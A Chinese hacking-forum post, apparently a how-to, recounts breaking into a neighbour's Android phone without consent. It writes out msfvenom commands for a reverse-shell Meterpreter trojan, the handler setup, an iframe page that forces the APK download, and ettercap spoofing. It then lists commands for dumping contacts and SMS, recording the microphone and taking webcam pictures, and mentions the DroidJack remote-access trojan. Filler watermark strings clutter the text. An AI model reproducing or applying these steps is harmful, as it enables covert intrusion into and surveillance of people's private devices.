找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2450|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ _8 W8 h$ r3 Z. r F 五、msf+ettercap入侵邻居安卓手机 " k2 |( S3 r5 D3 @

7 Z6 U ?6 V. O+ S8 v% Y, G+ b

2 U3 y+ d; j* ~- G+ H 首先启动msf 3 x4 _6 |6 ^8 W9 ?6 m6 x4 a

, h1 `7 I# f1 ~5 N

" V" V6 ~1 `+ t+ `$ Y 先用kali生成一个安卓木马,如下命令: 7 w4 Q# r6 g( u Y7 S9 X

+ {. C* e5 w8 }' a# @

& R' G1 }6 t4 T; ^" G& k- e Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk - o+ |: S$ S. g5 Z# a# S; o0 |" ]

9 x* i# d; a- F2 m A/ W1 ]. |

$ ?+ s+ {7 J+ }! m 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 ! B4 ~7 i: [& j+ ^+ o( Z @1 T

8 l$ Y, o* i2 M1 b3 F3 I1 U

' c/ D. ?& ?& O- ?9 Y6 D 然后进入msf $ o8 u" D# Z0 V6 G2 y1 z; P9 _' j2 [

b9 h5 s# P4 P" D

$ c0 I/ u: |# b8 t6 E use exploit/multi/handler 0 s. ~( T Y" ~: g8 c8 z$ e, {

( s4 x: F' N# ^2 l. I: Z

/ U$ [3 c9 \5 u5 A3 p+ T% ] set payload android/meterpreter/reverse_tcp 2 e; s( k5 X3 h9 I0 `" U5 Y

R4 Y* H5 v7 N* J9 L8 x& L

3 E6 b4 |3 V* k, u, R4 Q set LHOST 192.168.0.109 //ipkailiip $ F Y" c! {' A5 y" i" a) C

6 R; U$ [* u; `9 B7 u m l

4 W# k8 G" f3 s set LPORT 44444 //端口一定要与前面生成的木马的端口一致 / ^& C/ H. t* T

7 @$ E" B. [- p4 b3 }

7 j8 s, F! t% _" _ Exploit 6 ~: v3 L2 Y& d% d1 v( r

) ^7 y, I+ }, d Y# D) U

$ ^( m' z3 @# k   6 {/ p& c$ j' F$ A- X: D9 C3 H

) f8 ^# b" @/ u' u! M5 P1 C7 D

) a& `. x2 T, _+ e' ^7 Z6 a 下面我们开启ettercap -G 0 A( i5 C. N6 T/ Z4 C6 h1 ~* t6 K

) d2 A7 `* O" |" I( ^' X" y

1 c C9 w1 C$ s0 e 我物理IP + u# w7 q' G/ i3 |' H; b2 L& A

: v8 F/ l4 H$ x/ ^: Z. ^

' a1 i6 R& ^ o6 D2 v9 i2 k& A   - t8 T8 R6 K% m% \3 Y

8 K" l6 D2 O) w$ N" v

) ]% \8 I. S n* f5 ~$ [# u 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, / `7 j+ U q. b t# N& Y. @* V

$ K+ X5 q6 H, q# ^- y3 m

. z. D# f% i* i$ t. ^0 x; J 下面我们来设置一下 7 |& m1 s4 _% T) ?% l7 Z6 b

: j/ J: E% I" G( Y

% Q3 A$ `+ n! }3 Z1 N! `- ~   1 n! S9 P& S, y3 [, p/ o

$ U5 A ?3 u4 M

. f3 k) i' k* H2 Y 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, * d- L# D$ j3 h$ [ t

4 I$ V/ I% }; V8 S3 K2 F& H9 s( D

# q3 p9 c+ [" _* N6 c6 x   R! V* R9 M" H( Q- | s% w

; d& u2 {% `# g( s5 {! A

6 _: T4 D" D( K& {6 g   : A+ v% i% p1 u) R

+ Q1 B! T' Y. I

4 E. M, E& m: I; y R$ ~) j   ! P; j' @1 ~( \8 b8 F: f* _- P

4 ` Z1 x6 [/ X. y8 r$ B2 w) ]

2 W0 X# W* M! ]# j6 t9 s   ' \7 l' U( t9 `" j" S1 C

; X7 F( Z0 i( J2 X) k& d; r

+ r% N* _" k8 G- f2 f, o- x$ r   9 Z p; S- `: @: r' i- d

* y( Z" ]" A7 }% V" b

5 @2 R* H! E: u! W* A- e2 a% G   9 y- A" x, w3 K5 r) F. _6 I

7 B8 G3 A3 I+ k% Z

: B& v! m) j; h. D4 a% ?   - }6 D) X/ m- u' `3 ^

5 p1 _4 D$ N+ \$ @

8 b; ]7 x" S3 ?$ ~0 l, `   ; J- w1 |- Q$ A; z3 ~8 ?

3 q z, L2 p) O4 r, M. y( l

& ~. d0 d! s/ Y! x& V: X   8 J: n9 O% Y4 h8 h: o7 a/ |

2 B. Y8 O8 j0 D; {; D5 ]: c6 V

3 ]1 `4 Q R; I1 U# Y# j   3 _: D% P) J- P/ n8 p/ X* U7 `

+ o" @) y- s( F3 D+ E9 a3 v

* S; @ K% m D   - I8 x. y- n! s- `& s$ R

( Z" g; u9 j, V6 y" ?6 ~2 y

5 [2 i9 b' n, M- ]% `   ( [8 ]7 n' V! [* A" |/ e

1 Z5 a8 o4 z9 p Y+ L

0 d4 D, X4 {- T   ) [- H0 `, c" D/ I, H) h( d& j3 x

# C* q+ L3 {! |, M

1 j, s% {5 M+ l: Y) J 下面我们开始攻击 5 V$ k5 N" [2 P* |( h. y

+ s# C/ l9 h" X: o; E$ s- W

5 Y$ p$ L% K2 b; J0 m   - H( `/ R* k( B# e, f% o! m& B

3 F. w; d$ a: ^+ [$ T

" o9 }( J7 F9 J. |( i+ K1 W   _9 U: n7 f$ p4 {

9 E% z* M4 A$ s! t& V! N6 w2 I# J

: ~4 S m& U: U+ t2 O   . \! _7 X4 C0 C1 `; T# t O3 _

7 y5 ?( T* K, M8 Z

4 e/ V6 T( P: J" r$ ^   - @& ~( Q: w3 d' U; s4 L- @

4 h4 C( \& W- m% x' \, l! I X% }

( q8 K6 `7 D9 u8 w   ! b; n, L: @3 u; x# `5 \

- L) o5 H2 b! E; D8 A6 I

4 q# h/ Y, [9 B. _5 @) E3 ` 大概过了5分钟多,发现反弹成功了 ) a2 @' Q# i. n r" p

@5 `8 j0 b% n# x. Q2 j

! a$ u* Z+ O/ r) L2 s, q   * G5 Y3 C7 o; @8 Y2 V

* V9 S6 I8 [% U2 q# d

6 y$ d5 G! M" p) t0 _   + J1 K: J" E$ H% f

) M: P4 a( p/ |$ g

! z, U9 N# x, J0 ]   ) @5 g. K0 f w

4 c- ~5 z" f5 F8 Z# q7 x) V, y5 c

2 A+ e' Q( _4 b8 r6 N& r   7 l. J9 |( s4 H% }' _9 Z& Z

8 E1 m. c$ N' H( J J4 V" f1 p

1 C& \* q0 W: B3 }) b+ A% `3 A; C   8 y# H$ j' j% |# @# x' ~. d

t1 ~8 }" x0 R. b* w2 \9 B' d

6 l7 F0 ?2 r+ y+ T/ p. [/ y   - S# B! |- ]. K; t$ y; g4 v

8 ? D& Z; F6 l! B# L6 B& X, P Q

2 [1 N( r# W! w: w   + s+ l. l& S5 z( f3 ~

& h, Z& @5 h% Q& c8 Y

: }9 w7 q. A e% l4 W 执行命令 - E; H" Z1 }6 `/ N q @

! Q: Q7 a- M; u' u/ T* S: ?. k, _

7 L: b- b; N# e2 X% g   4 ~5 @4 u# r0 ?* [; k& S3 r' G0 G

6 _- I+ K- x& Z# _- ]

& y8 d4 c }" n ^' k5 | dump_contacts    --》这个是导出电话 2 O+ f4 g4 X9 Q6 x( k3 D- _

) A; m3 s, y5 r; s" T5 X- D9 F

0 Q1 c+ v, C- P6 ^: f dump_sms --》这个是导出信息 ! g5 w5 |+ C( {/ H

+ G+ S. N+ p* ~: x+ W$ ~+ @

2 P1 ]8 |$ |9 b. e3 K5 U7 b record_mic     Record audio from the default microphone for X seconds ! q1 L/ R7 h. b( H; F4 n

3 o6 f9 C" ^ n4 x: P7 m8 G

9 s4 v0 k$ E( D& k     webcam_chat    Start a video chat A: N" T2 o4 B& q; S5 n; u2 e$ B- j$ W

- b8 g. ^% u. P

" m4 f8 r5 R; Z# ^     webcam_list    List webcams ) ~3 a/ m' l* K$ o0 p

; f3 W+ S r1 s8 Q

9 P" Y# W6 O, x" y+ Y" o/ N     webcam_snap    Take a snapshot from the specified webcam " J& H9 X# j6 x$ D8 l

5 w4 F. u. ^3 {1 T# }7 Q

8 N4 s& d7 X$ F0 r! m9 O webcam_stream  lay a video stream from the specified webcam % i- P; c; o4 b" F p1 D$ O" t, r$ h

; _' ~9 V: k* X, l& q( C$ d

3 f! e" g8 f3 q6 V# |( a   5 V" ]) C7 ]7 X: H9 l0 I- J. i

& ?0 Q6 ?2 `( I7 E4 y

% ^: ~7 F! K/ ^   - X5 D$ T. j1 L: ?

* ]" w) }& v) b4 ~1 P* y" ~( [

# P) `' o% ^- I0 M 我们打开看一下电话薄, ) H, x- c* `" x2 p# l1 p7 U, i

6 N1 u, k8 m, r; p

* Q, ~) N3 P) u% E7 v   4 J. i! l' j. @

' T6 y( s% K3 K( \1 m/ u( Q

! E7 \0 i. a! V+ O5 s   6 ]; e' \5 ^" w8 d. h

& K$ s, Y* b( x: _2 S6 E- c

0 K7 P* e9 }0 L4 E   2 X2 S7 e8 U' v5 l; M

0 @: h, _; Z, E: {- x1 R" I

+ |0 H8 x6 U& d0 a$ j( `* d   ! g! _ _6 J( y* p: T

7 l6 M& u9 R/ R5 A4 d/ \, M

& t z$ {& Q: A0 p* ]7 p H" n! T   ; H b- l1 B9 ?8 M4 o# N

( k, s9 |% j" n, F }

+ G* u" l3 r# U6 N0 n   * A% o8 \1 O% D/ U# m

0 k) I; j1 k$ M1 ~# _6 ?

2 L5 c$ w; |! c! g 我们同时欺骗成DroidJack木马,使用方法如图: / e& \0 n! A A* o$ j

d( t% f; p4 @" y. p, k

6 o% L. f! r. B+ ~) j   * Z, ^2 [' r1 ?* F0 w

. E0 f: F( Y# m" A( u1 i

' n( k r0 y6 h1 ~; o! p2 h   / Z* h/ b/ M( X% e

1 ^; q" V! k$ [) U

6 _2 r5 ~$ t M6 p3 \# c   \" k; J0 u: q2 r$ s1 J& |

. C- K I2 f. G

5 V" ]: L8 {" g' ?; F 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 + [# H# |; |3 P7 m3 w2 d

7 m3 y& t( e" R0 l

( n0 l8 I! N6 ?0 y. q% G/ a   9 w$ W) } m- g2 R

2 L, \/ G% D% d$ K9 [4 T

) a( _# r9 ^8 o( b3 V/ i& `   ; Z/ x1 S" C* ]- I; `% e

0 s- J2 L/ {, x: | s- t/ G

* k6 k9 O" M% Y9 C: H" R% s( A5 O   6 Q3 n% R5 P/ ~+ f+ h* H

6 G0 z: M& G. {) [

0 `( Q! ?2 E2 R" j: c2 u. O2 Z 5 [+ ~; y2 L1 }& v/ a( r2 C* }' k

; u' A u# T# C/ E$ x

7 s' K+ I- N$ _0 m) h/ \
- e- `5 D: i" \# d2 d3 h' P j

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表